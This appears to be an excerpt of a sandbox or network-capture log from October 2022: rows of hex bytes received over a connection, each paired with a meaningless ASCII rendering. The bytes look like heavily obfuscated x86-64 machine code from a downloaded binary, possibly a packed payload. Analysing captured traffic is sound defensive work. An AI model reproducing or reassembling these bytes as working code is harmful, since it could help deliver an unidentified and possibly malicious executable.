                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14664INData Raw: 49 81 eb 04 00 00 00 41 89 2b 80 f6 67 49 81 ea 04 00 00 00 40 0a d4 80 ea 17 66 0f ca 41 8b 12 f9 80 ff dc 41 33 d1 f7 da d1 ca 81 ea bd 2c 77 23 66 85 eb e9 39 0f 06 00 49 8b 03 c1 c9 25 66 0f ba e1 66 36 8b 08 fe c0 0f 94 c4 66 41 33 c4 49 81 c3 04 00 00 00 f5 41 89 0b 66 0f a3 e8 49 0f b7 c0 48 81 eb 04 00 00 00 8b 03 f8 48 81 ff db 0f 1e 34 41 33 c2 c1 c0 03 66 41 f7 c1 37 64 f9 f7 d0 41 3b c3 f7 d8 35 e0 48 2b 7b f9 f7 d8 41 f6 c0 68 f8 41 52 66 85 f7 4d 0f bf d2 41 c0 da 09 31 04 24 41 c0 e2 6d 45 0f b7 d6 41 5a f7 c2 85 32 b9 36 48 63 c0 48 03 f0 56 c3 49 8b d3 49 81 eb 04 00 00 00 41 d2 d8 66 41 0f bb e8 4c 63 c5 41 89 13 66 41 81 fb 97 71 49 81 ea 04 00 00 00 41 80 d8 75 e9 30 f7 0f 00 c3 d1 c0 e9 77 5a 08 00 41 ff e2 d1 ca e9 7d 62 0b 00 4c 8b
                                                                                                                                                                                                                                    Data Ascii: IA+gI@fAA3,w#f9I%ff6fA3IAfIHH4A3fA7dA;5H+{AhARfMA1$AmEAZ26HcHVIIAfALcAfAqIAu0wZA}bL
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14680INData Raw: f7 d2 48 8b f3 44 0f b7 d6 e9 e6 80 04 00 ff c2 f8 f7 d2 f8 f7 da f7 d2 53 31 14 24 48 0f a4 eb 3b 41 03 de 5b f5 48 63 d2 4c 03 ca e9 58 07 05 00 49 8b 30 48 0f c1 db 36 66 0f b6 0e 49 81 c0 06 00 00 00 0f 97 c7 66 0f bb c3 66 41 89 08 49 81 e9 04 00 00 00 41 8b 19 f9 f5 e9 dd a8 00 00 0f 84 9e 3c 06 00 48 8d 3d 0c c0 12 00 56 66 0f ab e6 40 d2 e6 66 2b f6 0f b6 31 66 41 81 fc 59 1a 4c 3b fa e9 6c e4 09 00 4d 8b 0b 41 f7 c3 93 49 b1 50 41 8b 31 f9 49 81 c3 04 00 00 00 40 80 fd 3b 41 89 33 40 0f c0 f6 48 81 eb 04 00 00 00 8b 33 80 fb e7 66 45 85 cc 33 f7 81 c6 74 7e f9 45 44 84 f1 e9 a6 c1 0c 00 0f 85 d1 5d 03 00 5e f7 d0 41 89 03 66 0b db 49 81 ea 04 00 00 00 66 0f be de 66 44 0f bb fb 49 0f b7 dd 41 8b 1a e9 fa 7b 05 00 48 ff c0 81 f2 a8 57 63 5c e9 a8
                                                                                                                                                                                                                                    Data Ascii: HDS1$H;A[HcLXI0H6fIffAIA<H=Vf@f+1fAYL;lMAIPA1I@;A3@H3fE3t~ED]^AfIffDIA{HWc\
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14696INData Raw: 66 44 0f b3 ef 48 0f ba ff 54 66 40 0f b6 fe 40 f6 d5 40 d0 c5 40 12 fd 40 f6 dd 44 0f a3 ef 66 44 0f bb d7 40 c0 df a7 40 f6 d5 48 0f b7 f9 c1 cf 4e d3 cf 40 d0 c5 40 80 e7 56 40 32 dd 40 d2 ef 49 81 ea 02 00 00 00 40 d2 f7 40 c0 e7 52 66 41 89 2a 41 2a fb 8b 3e f5 48 81 c6 04 00 00 00 40 f6 c4 af f5 33 fb f7 d7 e9 47 bb 0e 00 d1 cb 49 f7 c5 10 1f 6b 14 66 41 85 de f5 81 c3 ac 01 b0 60 49 f7 c5 44 3d 0a 38 44 3b c4 56 31 1c 24 40 c0 f6 ea 48 63 f1 40 86 f6 5e 45 84 f3 48 63 db 4c 03 cb e9 fe 66 09 00 66 44 8b 1f 66 41 0f ba fa 07 41 80 e2 fe 66 45 0f ab c2 66 44 8b 57 02 48 81 ef 06 00 00 00 e9 a4 84 00 00 48 8b 17 66 45 0f be df 48 81 c7 08 00 00 00 45 0f bf dd 41 f7 d3 66 45 0f b6 df 48 8b da 4c 8b df e9 08 de 11 00 c1 c5 03 41 3b f9 81 f5 50 34 21 72
                                                                                                                                                                                                                                    Data Ascii: fDHTf@@@@@DfD@@HN@@V@2@I@@RfA*A*>H@3GIkfA`ID=8D;V1$@Hc@^EHcLffDfAAfEfDWHHfEHEAfEHLA;P4!r
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14712INData Raw: f7 d0 41 52 66 41 0f ba fa b3 66 41 ff c2 66 44 0f bd d1 31 04 24 4d 1b d7 66 41 ba de 6c 49 81 d2 4a 67 57 61 41 5a f5 48 63 c0 f5 f9 f8 48 03 f0 e9 dc 82 10 00 41 d0 ca 41 f6 da 45 2a d9 41 80 ea 81 41 d3 f3 41 fe c3 66 41 f7 c1 25 1d 41 32 ea 41 f6 d3 41 0f ba fb e4 42 89 0c 14 44 8b 1b 48 81 c3 04 00 00 00 44 33 dd 41 81 c3 76 21 a7 42 41 f7 d3 41 81 c3 73 10 13 2f 41 c1 cb 03 55 44 31 1c 24 5d f5 4d 63 db 49 03 f3 e9 15 af 03 00 e9 b0 f3 05 00 66 44 89 17 e9 1c 60 02 00 0f c9 41 f6 c0 84 41 52 31 0c 24 66 41 85 ed 66 41 d3 ca 41 5a 48 63 c9 f7 c6 02 08 22 78 48 03 f1 56 c3 ff c2 d1 c2 49 81 fb 31 5d 38 1f 44 3a d1 f8 81 f2 74 52 f7 44 e9 6b 2a 00 00 ff c7 41 3a f5 e9 14 76 07 00 4c 8b 0f c1 c2 43 d2 c7 40 1a dd 36 41 8b 19 48 81 c7 04 00 00 00 89 1f
                                                                                                                                                                                                                                    Data Ascii: ARfAfAfD1$MfAlIJgWaAZHcHAAE*AAAfA%A2AABDHD3Av!BAAs/AUD1$]McIfD`AAR1$fAfAAZHc"xHVI1]8D:tRDk*A:vLC@6AH
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14728INData Raw: fb 44 32 df 0f b7 db 41 fe cb 0f b7 d9 66 c1 d3 3f 44 0f ab d3 41 d0 cb 49 0f b7 de e9 bf da 03 00 c1 c0 02 49 f7 c1 f5 3c bf 6c 41 3a f5 0f c8 41 3a de f8 f7 d8 d1 c8 45 3b fb 55 48 0f a3 e5 66 0f bc e8 66 0f ba f5 76 31 04 24 f9 48 63 ef 66 44 0f a3 c5 5d 41 81 f9 01 16 d2 2e 48 63 c0 48 03 f0 e9 91 83 08 00 66 b9 79 21 9c d0 ed 41 8f 03 48 81 eb 04 00 00 00 8b 0b 41 33 ca f5 f7 d1 f8 e9 01 43 06 00 ff c0 f8 f9 35 b1 4b ae 6f f8 f5 2d 0f 2b a2 03 d1 c8 f8 66 41 81 f9 87 5d 41 51 41 f6 d9 31 04 24 41 59 48 63 c0 66 44 85 d0 41 80 f9 18 48 03 f0 e9 4e 42 10 00 ff c0 f8 66 41 f7 c2 18 69 f7 d8 f7 d0 f8 35 29 56 2e 23 e9 81 87 0a 00 4c 8b 0f 66 c1 eb ae 48 8b 47 08 49 0f b7 de 32 da 66 41 81 fb 01 68 49 f7 d1 48 f7 d0 48 81 db 11 76 01 34 4c 0b c8 48 0f b7
                                                                                                                                                                                                                                    Data Ascii: D2Af?DAII<lA:A:E;UHffv1$HcfD]A.HcHfy!AHA3C5Ko-+fA]AQA1$AYHcfDAHNBfAi5)V.#LfHGI2fAhIHHv4LH
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14744INData Raw: e1 da bb ea 78 4c 8b ed 0f ef 1e 89 91 79 2e 8e e6 c3 7f 87 7f 55 4f 80 08 c4 52 3f 98 52 62 38 ef e8 33 31 76 7e 03 36 01 dd 96 52 9f 4b a6 55 e8 f1 f7 5c 71 67 c7 5b 06 5a ea 3d b0 cc da 3a c7 76 8b 33 5e e0 bb 34 29 43 2e 50 b7 d5 1e 57 c0 6f 4f 5e 59 f9 7f 59 2e 68 62 e6 be fe 52 e1 c9 44 03 e8 50 d2 33 ef 27 71 a6 8b b9 e7 96 8c ce 5d c7 85 57 cb f7 82 20 3e fa 8a ad a8 ca 8d da 12 9b 84 43 84 ab 83 34 27 3e e7 aa b1 0e e0 dd 0b 5f e9 44 9d 6f ee 33 0c 72 51 a3 9a 42 56 d4 20 13 5f 4d b6 23 58 3a 15 b6 3c a4 83 86 3b d3 39 d7 32 4a af e7 35 3d 02 8b 8f fd 94 bb 88 8a 2e ea 81 13 b8 da 86 64 1b 4f e2 fa 8d 7f e5 8d 37 2e ec 14 a1 1e eb 63 30 03 54 f3 a6 33 53 84 1c 62 5a 1d 8a 52 5d 6a 29 c7 39 f4 bf f7 3e 83 05 a6 37 1a 93 96 30 6d 66 9b 38 e0 f0 ab
                                                                                                                                                                                                                                    Data Ascii: xLy.UOR?Rb831v~6RKU\qg[Z=:v3^4)C.PWoO^YY.hbRDP3'q]W >C4'>_Do3rQBV _M#X:<;92J5=.dO7.c0T3SbZR]j)9>70mf8
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14760INData Raw: f0 66 41 d3 e6 9d 44 0f b7 eb 41 f6 d6 41 5c 41 5d 66 44 8b f8 41 5a 66 44 0f b6 f0 40 f6 d6 0f bf eb 41 5e 40 8a ec 48 0f c9 41 5f 40 b6 66 59 41 0f b7 ea 4d 0f 43 c8 5e 66 0f 4e eb 41 59 5d e9 00 62 00 00 44 8a c8 9c 41 3a ca 41 8f 03 45 0f a3 f1 45 0b ca 66 45 0f ab f1 48 81 eb 04 00 00 00 45 1a cb f5 44 8b 0b 44 84 db 45 33 ca f9 f8 f5 41 f7 d1 e9 79 c7 00 00 41 52 44 0f b7 d3 4c 0f bf d4 9c 52 f9 41 57 41 51 0f 9b c6 41 55 41 53 f9 45 0f bb f9 0f 93 c2 41 50 41 56 66 45 0f ab e0 66 41 d3 c0 51 45 0f bb e1 0f ba f1 cd 41 0f ba e3 12 56 66 41 d3 c3 66 99 99 55 66 45 0f 41 dc 41 0f 99 c3 48 b9 00 00 00 00 00 00 00 00 66 44 0f ab ee 51 4c 8b 94 24 90 00 00 00 66 0f bb ca 41 d1 c2 41 87 d0 41 ff ca f6 c1 54 66 45 0f ac eb f1 66 41 81 f3 95 14 41 f7 d2 41
                                                                                                                                                                                                                                    Data Ascii: fADAA\A]fDAZfD@A^@HA_@fYAMC^fNAY]bDA:AEEfEHEDDE3AyARDLRAWAQAUASEAPAVfEfAQEAVfAfUfEAAHfDQL$fAAATfEfAAA
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC14776INData Raw: 85 ee f8 48 63 db f8 4c 03 db e9 ef 79 0e 00 56 c3 81 fb 01 00 00 00 e9 42 31 00 00 49 8b 2b 41 8a 7b 08 66 85 e8 41 f7 c4 68 3d 35 28 49 81 c3 0a 00 00 00 66 45 3b c7 40 88 7c 25 00 49 81 ea 04 00 00 00 d3 d5 41 8b 2a 41 f6 c6 1b f8 33 ee 81 ed eb 56 6c 6a e9 34 1b 0f 00 0f ca e9 57 9a fe ff 41 51 49 0f ba e1 50 41 c1 f9 be 41 80 c9 b1 44 31 04 24 66 44 13 ca 41 0f ba e1 d7 49 3b da 41 59 f5 4d 63 c0 49 03 f0 56 c3 66 41 f7 c6 37 35 41 33 cb 41 84 c5 81 e9 b2 66 87 2b 0f c9 41 3a cd 81 e9 67 0c 1b 28 66 41 f7 c2 fd 5f f8 f7 d9 f5 d1 c1 a8 b2 f8 49 81 f9 8b 5e 71 7b 41 53 31 0c 24 45 0f 40 dd 66 45 0f a3 d3 66 41 0f ab c3 41 5b f9 48 63 c9 48 03 e9 e9 e0 28 0b 00 66 45 0f b6 01 80 e9 e8 41 8a 49 02 49 81 d2 75 3e f0 3f 49 81 e9 06 00 00 00 41 c1 c2 db 41
                                                                                                                                                                                                                                    Data Ascii: HcLyVB1I+A{fAh=5(IfE;@|%IA*A3Vlj4WAQIPAAD1$fDAI;AYMcIVfA75A3Af+A:g(fA_I^q{AS1$E@fEfAA[HcH(fEAIIu>?IAA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14792INData Raw: 00 41 d1 c0 f9 41 81 e8 9a 48 9b 2f f9 40 f6 c5 23 49 81 f9 da 4e 0e 3f 41 81 f0 7e 1b a4 63 41 ff c0 66 44 85 e9 41 53 66 44 0f be dd 44 31 04 24 41 d2 cb f9 41 5b e9 d1 09 0a 00 44 8b 07 66 41 0f a4 e9 dc 66 41 0f ac f1 5e 66 45 13 c8 44 8b 4f 04 48 81 ef 04 00 00 00 45 03 c1 e9 33 6d 05 00 49 8b 3b 66 d3 da 81 c2 7f 0e 90 67 66 0f a3 c2 49 8b 53 08 49 0f b3 c8 66 44 85 df 4d 13 c1 49 81 c3 10 00 00 00 4c 63 c0 49 f7 d8 36 48 89 17 49 81 ea 04 00 00 00 66 41 81 c0 9e 6c 45 8b 02 45 3a dc f5 44 33 c6 e9 70 bb 0a 00 e9 38 27 05 00 ff c0 66 85 c9 0f c8 e9 1b f4 04 00 41 ff c2 41 f7 da f8 44 3a df 41 53 66 41 0f ba fb b8 44 31 14 24 41 0f bb f3 41 5b 40 f6 c7 ca 45 84 d7 4d 63 d2 41 f6 c3 b5 49 03 ea e9 e8 31 0c 00 0f c9 ff c9 41 51 31 0c 24 44 8a c9 41 0f
                                                                                                                                                                                                                                    Data Ascii: AAH/@#IN?A~cAfDASfDD1$AA[DfAfA^fEDOHE3mI;fgfISIfDMILcI6HIfAlEE:D3p8'fAAD:ASfAD1$AA[@EMcAI1AQ1$DA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14808INData Raw: 00 00 00 8b 13 3a c0 66 41 f7 c4 b1 4a f5 41 33 d2 f6 c4 0f f9 81 c2 03 2c db 63 c1 ca 03 0f ca e9 28 6d 06 00 ff c8 f7 d0 05 0d 7c 46 3f f8 c1 c8 02 05 6c 16 f1 18 0f c8 80 f9 74 f7 d0 44 85 db 41 53 41 0f ab e3 41 0f ba fb a8 45 0f b3 cb 31 04 24 41 f6 d3 66 41 81 d3 78 3b 41 5b 48 63 c0 48 03 e8 ff e5 f5 41 81 c1 53 34 87 39 41 0f c9 f5 41 d1 c1 e9 37 80 0a 00 41 51 c3 e9 c5 73 04 00 4d 03 c1 e9 6b f8 10 00 66 41 8b 3b 41 c0 e8 2a 41 8a 4b 02 41 d2 c0 49 81 eb 06 00 00 00 44 32 c1 66 d3 e7 4d 0f bf c6 66 41 89 7b 08 45 0f b7 c0 4d 87 c0 9c 41 8f 03 f5 48 81 eb 04 00 00 00 4d 0b c1 41 c0 e0 92 44 8b 03 e9 6c 25 08 00 e9 1e b5 06 00 66 41 0f b6 02 66 d3 ca 41 8a 4a 02 86 f2 f9 e9 73 8f 05 00 d1 c1 41 3a f3 81 f1 47 45 96 57 57 66 44 0f ab ff 66 41 03 fa
                                                                                                                                                                                                                                    Data Ascii: :fAJA3,c(m|F?ltDASAAE1$AfAx;A[HcHAS49AA7AQsMkfA;A*AKAID2fMfA{EMAHMADl%fAfAJsA:GEWWfDfA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14824INData Raw: 00 41 81 fe 42 60 1d 63 f9 48 03 f2 e9 50 8a 07 00 f7 d2 f8 f9 c1 ca 03 e9 e7 9e 0f 00 e9 1d a0 06 00 41 81 c2 49 1c 49 64 41 c1 ca 03 f8 81 fc 89 7f 1e 2a e9 63 c5 ff ff 41 80 f9 d6 41 0f ca f8 66 85 e7 41 f7 da 66 f7 c6 84 0f 41 f7 d2 41 f7 da 80 fa 0f f5 41 53 41 80 f3 5f 45 12 de 44 31 14 24 66 45 87 db 41 5b 4d 63 d2 49 03 ea e9 10 ba 0a 00 f7 d1 66 41 81 fb 3c 6d 41 3b d0 81 c1 c0 08 21 67 e9 4c 99 fd ff 49 03 e9 e9 9d 45 03 00 0f c8 ff c8 e9 2f 57 0a 00 f7 d0 e9 8f e4 0e 00 41 33 d1 81 f2 6f 59 3e 3a ff c2 d1 c2 81 f2 74 52 f7 44 0f ca e9 5f 0c 0c 00 ff c0 f8 c1 c8 03 f8 f5 41 80 fd 4f f7 d8 66 44 3b e4 e9 73 73 06 00 ff 74 dd 20 81 eb 01 00 00 00 0f 85 de dc 0a 00 48 8b 44 25 00 f8 48 81 ec 20 00 00 00 e9 ae 6c 06 00 41 8b 02 f9 33 c6 e9 ff 19 06
                                                                                                                                                                                                                                    Data Ascii: AB`cHPAIIdA*cAAfAfAAASA_ED1$fEA[McIfA<mA;!gLIE/WA3oY>:tRD_AOfD;sst HD%H lA3
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14840INData Raw: f9 66 41 3b fe f8 45 33 d3 f8 81 fd 7c 1f f6 1b 41 f7 da 41 d1 ca e9 87 99 fd ff e9 27 f4 03 00 f7 d0 f8 f9 0f c8 66 81 fc 48 05 05 4e 4e 3d 4c f7 c6 dc 25 58 25 55 40 80 f5 99 41 0f 45 eb 40 86 ed 31 04 24 66 d3 ed 5d 48 63 c0 49 81 f9 b3 0e b5 6b f9 48 03 f0 e9 db a3 09 00 41 33 ca f7 d9 e9 cd 56 09 00 f7 d0 ff c8 f9 56 31 04 24 66 d3 d6 66 44 0f ab e6 5e 66 45 3b cb 48 63 c0 f8 41 81 fd 6a 37 c0 4d 4c 03 c8 e9 3e ff 01 00 4d 8b 03 48 d3 da 66 0f a4 d2 78 41 8b 7b 08 66 0f ba f2 5e f5 66 f7 c2 eb 1c 49 81 c3 0c 00 00 00 d2 fe 66 0f a4 f2 54 36 41 89 38 66 03 d7 fe ce 41 0f b7 d6 49 81 ea 04 00 00 00 66 81 e2 f2 6f 66 0f be d5 66 0f b6 d1 41 8b 12 41 33 d1 ff ca f5 f9 e9 74 75 00 00 ff cf 41 3b d3 0f cf 41 f7 c6 40 6b 8b 5b 4c 3b eb 56 40 d2 d6 f9 31 3c
                                                                                                                                                                                                                                    Data Ascii: fA;E3|AA'fHNN=L%X%U@AE@1$f]HcIkHA3VV1$ffD^fE;HcAj7ML>MHfxA{f^fIfT6A8fAIfoffAA3tuA;A@k[L;V@1<
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14856INData Raw: 10 4d 0f bf d7 9c 66 45 87 d2 41 f6 d2 41 d2 fa 8f 07 49 81 d2 24 60 60 6f 44 8b 13 48 81 c3 04 00 00 00 40 84 df f6 c4 2b 44 33 d5 41 ff c2 41 0f ca 49 81 f9 3f 79 6a 48 66 f7 c2 b3 16 41 f7 d2 f8 41 81 c2 79 79 86 4a 41 0f ca e9 39 f3 06 00 45 8b 11 41 8b 41 04 0f 96 c1 fe c9 41 8a 49 08 41 3a d9 49 81 e9 02 00 00 00 f8 48 f7 c2 91 42 6b 3a 41 0f ad c2 41 0f bf cf 45 89 51 08 9c 66 0f bb e1 41 8f 01 66 c1 e9 c5 66 41 0b c9 48 81 ed 04 00 00 00 66 40 0f b6 cd 0f 99 c1 8b 4c 25 00 66 44 3b d1 66 41 81 fa c6 1a 33 cf 81 e9 33 27 87 10 41 80 fb cb 44 3a d0 41 f6 c1 86 81 f1 3e 26 6d 77 f9 c1 c9 02 e9 4b 97 10 00 e9 5c c5 02 00 f5 40 f6 de 40 80 ee b0 22 d9 66 41 f7 c3 3e 75 c0 e3 79 40 80 f6 c4 66 41 0f b6 dc 48 f7 c4 9b 1a 6e 21 48 d3 db 40 f6 de 66 c1 f3
                                                                                                                                                                                                                                    Data Ascii: MfEAAI$``oDH@+D3AAI?yjHfAAyyJA9EAAAIA:IHBk:AAEQfAffAHf@L%fD;fA33'AD:A>&mwK\@@"fA>uy@fAHn!H@f
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14872INData Raw: 0f cf 66 40 0f b6 f4 9c 48 8b f0 66 41 0f b6 f8 41 8b fa 66 0f cf 49 8b f8 e9 7a 67 0e 00 f9 4d 03 d3 e9 ea e5 07 00 49 8b c3 41 fe c2 49 81 eb 02 00 00 00 66 41 89 03 48 81 eb 04 00 00 00 49 81 c2 32 74 96 39 44 8b 13 44 33 d7 f8 41 c1 ca 03 41 f7 da e9 b4 7e 0c 00 e9 10 e7 06 00 e9 88 e7 03 00 c3 41 f7 d0 e9 9f 77 0a 00 48 81 c6 04 00 00 00 41 33 db ff c3 f5 f7 d3 f9 45 3a eb 81 eb b9 75 2b 5e f9 0f cb f8 e9 ff f2 0e 00 44 3a dd 41 f6 c0 8d 81 e6 ff 00 00 00 8b 34 b7 66 41 81 ff 9a 55 c1 ea 08 33 d6 e9 4d 72 fe ff 41 84 c7 41 81 f0 1a 7d c2 4c e9 bd 0a ff ff 4c 8b 1f c0 e9 b5 8a 4f 08 f5 48 81 c7 0a 00 00 00 26 41 88 0b 44 2a da 44 8b 1b 45 3a dd 48 81 c3 04 00 00 00 44 33 dd 41 d1 c3 41 80 fa c6 40 84 de f5 41 81 c3 c2 29 5c 70 41 0f cb f8 41 d1 cb 41
                                                                                                                                                                                                                                    Data Ascii: f@HfAAfIzgMIAIfAHI2t9DD3AA~AwHA3E:u+^D:A4fAU3MrAA}LLOH&AD*DE:HD3AA@A)\pAAA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14888INData Raw: bc d6 66 0f ba e2 bc 8b 13 48 81 c3 04 00 00 00 33 d5 81 f2 c7 54 75 0b f9 f5 f7 d2 f8 f9 d1 c2 f5 e9 08 31 fe ff 66 45 0f b6 03 c0 f5 eb 48 d3 d9 41 8a 43 02 49 81 eb 06 00 00 00 41 0a c9 41 f6 d0 2a ee d1 e9 f6 d0 44 0f a3 f9 41 0a ca 0f 91 c5 44 0a c0 66 45 89 43 08 9c 80 d9 b5 41 8f 03 48 0f bf cf 48 ff c1 66 41 0f b6 cc 49 81 ea 04 00 00 00 66 ff c9 41 8b 0a f9 41 33 c9 c1 c9 02 f9 81 f1 7a 2f 61 5a c1 c9 03 f5 f9 f8 f7 d1 c1 c1 02 e9 28 d2 0f 00 ff ce d1 c6 f5 40 f6 c7 97 0f ce 57 31 34 24 5f 48 63 f6 f9 f8 4c 03 de e9 b5 b5 00 00 49 8b 03 66 0f bc df 40 d2 e7 36 8b 18 40 b7 f8 40 0f 99 c7 49 81 c3 04 00 00 00 e9 69 69 ff ff 0f b6 07 99 d2 e6 48 81 c7 01 00 00 00 41 84 d2 41 32 c1 40 c0 d5 af 48 63 d3 66 44 0f b3 c5 d0 c8 48 ff c5 66 0f cd fe c0 49
                                                                                                                                                                                                                                    Data Ascii: fH3Tu1fEHACIAA*DADfECAHHfAIfAA3z/aZ(@W14$_HcLIf@6@@IiiHAA2@HcfDHfI
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14904INData Raw: 03 48 c1 fe 0e 48 81 eb 04 00 00 00 8b 33 f9 40 f6 c4 33 45 3a eb 33 f7 f8 81 c6 26 1f 80 65 f8 0f ce f5 f9 c1 ce 02 f7 de f5 f9 0f ce 66 f7 c7 51 16 57 0f ba f7 2d 31 34 24 40 80 c7 f6 40 c0 ff 78 5f 48 63 f6 4c 03 c6 e9 e3 bb 0f 00 33 f7 f7 de e9 d1 d4 04 00 0f 31 49 81 eb 08 00 00 00 66 0f bc cc 41 89 13 41 f6 c3 39 66 0f ba f9 92 41 89 43 04 d3 e1 12 e9 66 44 0f a4 e1 99 48 81 eb 04 00 00 00 41 8b cf 66 45 3b c1 f5 8b 0b 66 81 fb 8a 5f 66 41 f7 c0 a1 67 e9 4a 62 02 00 e9 93 a3 08 00 d1 ca e9 6b 59 ff ff f6 c2 e4 41 89 00 0f ab c0 f8 98 49 81 e9 04 00 00 00 41 8b 01 33 c7 e9 24 5a 07 00 ff ca 56 31 14 24 41 0f b7 f1 40 80 ce a0 49 0f bd f7 5e 48 63 d2 4c 03 ca e9 e6 61 fc ff 49 8b 40 08 48 f7 da 49 8b 10 40 f6 d6 66 0f bd f2 49 81 e8 08 00 00 00 48 f7
                                                                                                                                                                                                                                    Data Ascii: HH3@3E:3&efQW-14$@@x_HcL31IfAA9fACfDHAfE;f_fAgJbkYAIA3$ZV1$A@I^HcLaI@HI@fIH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14920INData Raw: 55 0f 00 f7 d5 40 84 d6 f5 56 31 2c 24 49 85 df 66 44 0f ab ce 5e 44 85 c9 48 63 ed 3b d3 4c 03 cd e9 34 19 02 00 e9 04 c6 01 00 41 ff 33 49 81 c3 08 00 00 00 66 0f bd c4 9d d2 d4 45 84 e8 49 81 ea 04 00 00 00 41 8b 02 e9 05 dd fd ff e9 ec 1f 05 00 d1 c1 57 31 0c 24 48 c1 d7 fd 44 0f a4 ff a1 5f 41 81 fa be 35 4f 27 48 63 c9 4c 03 d9 e9 e4 27 0e 00 ff e6 f8 f9 33 de ff cb f9 d1 cb f7 d3 81 eb 77 66 1e 7b 45 84 c9 e9 a4 9f 04 00 ff c8 f8 44 84 c2 66 f7 c7 b0 25 35 ed 32 0b 6a f9 0f c8 f8 57 66 d3 ef 31 04 24 40 22 f8 5f 48 63 c0 4c 03 c0 e9 6b d2 fe ff 41 f6 c0 3f 41 8b 2a 44 84 f6 e9 e0 56 09 00 e9 26 f5 04 00 66 41 8b 2b 40 c0 ff 31 40 d2 cf 41 c0 c0 44 66 41 8b 7b 02 49 81 d8 5a 7f cb 53 4d 2b c7 49 81 eb 06 00 00 00 66 45 1b c1 66 f7 d5 41 c0 f8 4d 41
                                                                                                                                                                                                                                    Data Ascii: U@V1,$IfD^DHc;L4A3IfEIAW1$HD_A5O'HcL'3wf{EDf%52jWf1$@"_HcLkA?A*DV&fA+@1@ADfA{IZSM+IfEfAMA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14936INData Raw: 00 4c 8b c8 e9 6d 98 0c 00 c1 ce 03 f8 57 66 f7 df 41 80 fa ea 66 0f a4 e7 77 31 34 24 40 80 df a6 5f f5 48 63 f6 4c 03 de e9 4f 17 0d 00 ff e6 c1 c2 02 e9 8d 27 05 00 0f 31 49 81 eb 08 00 00 00 4c 0f b7 c7 66 41 0f ba f0 e5 45 0f ac f8 a0 41 89 13 45 0f b7 c2 41 89 43 04 41 c0 f0 c1 66 41 81 c0 50 40 49 81 ea 04 00 00 00 41 80 c8 93 4d 0f bd c4 45 8b 02 66 3b eb 41 80 fa ed 44 33 c6 41 d1 c8 41 0f c8 f8 41 c1 c0 03 f5 41 f7 d0 f8 56 d3 ee 44 31 04 24 40 c0 fe 4d 40 2a f1 66 0f ba e6 a3 5e 4d 63 c0 4d 03 c8 e9 44 b5 04 00 48 f7 d0 66 3b dd 4c 23 d0 49 0f bf c0 4c 89 57 08 0f bf c4 9c 66 c1 f0 d3 f6 d0 66 44 0f ab c0 8f 07 8b 03 4c 3b c7 e9 bd b6 03 00 66 41 81 fe 59 09 f9 41 81 eb 5d 0a 92 58 41 81 f3 0d 17 0f 41 45 3a db 66 81 fb 78 5d 41 f7 d3 66 41 f7
                                                                                                                                                                                                                                    Data Ascii: LmWfAfw14$@_HcLO'1ILfAEAEACAfAP@IAMEf;AD3AAAAVD1$@M@*f^McMDHf;L#ILWffDL;fAYA]XAAE:fx]AfA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14952INData Raw: 00 00 00 f9 45 84 dc 41 89 13 f8 41 89 43 04 c1 c0 fa 48 81 eb 04 00 00 00 f6 d8 8b 03 f8 49 f7 c6 76 19 ac 7e 41 33 c2 e9 d5 4d 06 00 41 8b 1b 41 8a 4b 04 66 41 0f ba f0 56 66 41 c1 d0 13 41 80 d0 b6 49 81 eb 06 00 00 00 66 41 0f ac f0 b7 66 41 d3 e0 44 2a c2 d3 e3 e9 2b 5a 0a 00 41 ff c2 f9 41 f7 d2 41 81 ea 0b 72 6a 23 41 81 f2 c4 29 4d 65 4d 85 ef 41 f7 d2 f8 55 44 31 14 24 66 0f ba fd 7c 41 0f b7 e8 40 0a e9 5d 4d 63 d2 3c c2 49 03 f2 e9 2a 20 08 00 ff ca 44 84 ea 41 52 45 1b d6 31 14 24 41 5a 48 63 d2 f9 48 03 f2 e9 50 92 0b 00 49 8b 13 d2 d5 48 d3 f1 49 8b 6b 08 66 41 0f 4a cf d2 f9 48 f7 d2 48 f7 d5 66 41 0f bd cb 41 80 fd 4f 48 0b d5 f6 d1 41 0f 4e ce 66 41 0f b6 ce 49 89 53 08 9c 0f bf ca 41 8f 03 66 44 0f b3 d9 66 0f ba f1 84 66 81 e1 97 18 48
                                                                                                                                                                                                                                    Data Ascii: EAACHIv~A3MAAKfAVfAAIfAfAD*+ZAAArj#A)MeMAUD1$f|A@]Mc<I* DARE1$AZHcHPIHIkfAJHHfAAOHANfAISAfDffH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC14968INData Raw: 25 44 8b 13 f8 f5 48 81 c3 04 00 00 00 44 33 d5 e9 c2 be 08 00 49 8b 1b 66 44 0f a3 e5 66 44 0f b3 e2 48 8b 2b 48 0b d7 41 0f b7 d7 49 0f bf d1 49 89 2b c0 e6 96 66 44 0f bb e2 49 81 ea 04 00 00 00 40 12 d4 41 8b 12 41 33 d1 66 41 f7 c5 39 05 f5 45 84 db 81 f2 6f 59 3e 3a ff c2 f9 d1 c2 81 f2 74 52 f7 44 e9 18 63 0d 00 e9 bf 05 01 00 40 8a 6b 02 f9 45 84 f7 48 81 eb 06 00 00 00 f9 40 02 cd e9 3c 66 09 00 f8 d1 ca ff ca 81 f2 dd 4b 4e 09 c1 ca 03 41 52 41 81 d2 db 16 ef 34 44 12 d1 41 80 c2 d6 31 14 24 49 81 ea 74 06 48 73 66 45 0f ac e2 7a 41 5a 48 63 d2 80 fa 95 44 3a f6 48 03 f2 e9 55 31 07 00 9c f8 40 c0 ef c7 41 8f 03 49 81 ea 04 00 00 00 66 81 ef f1 7a 41 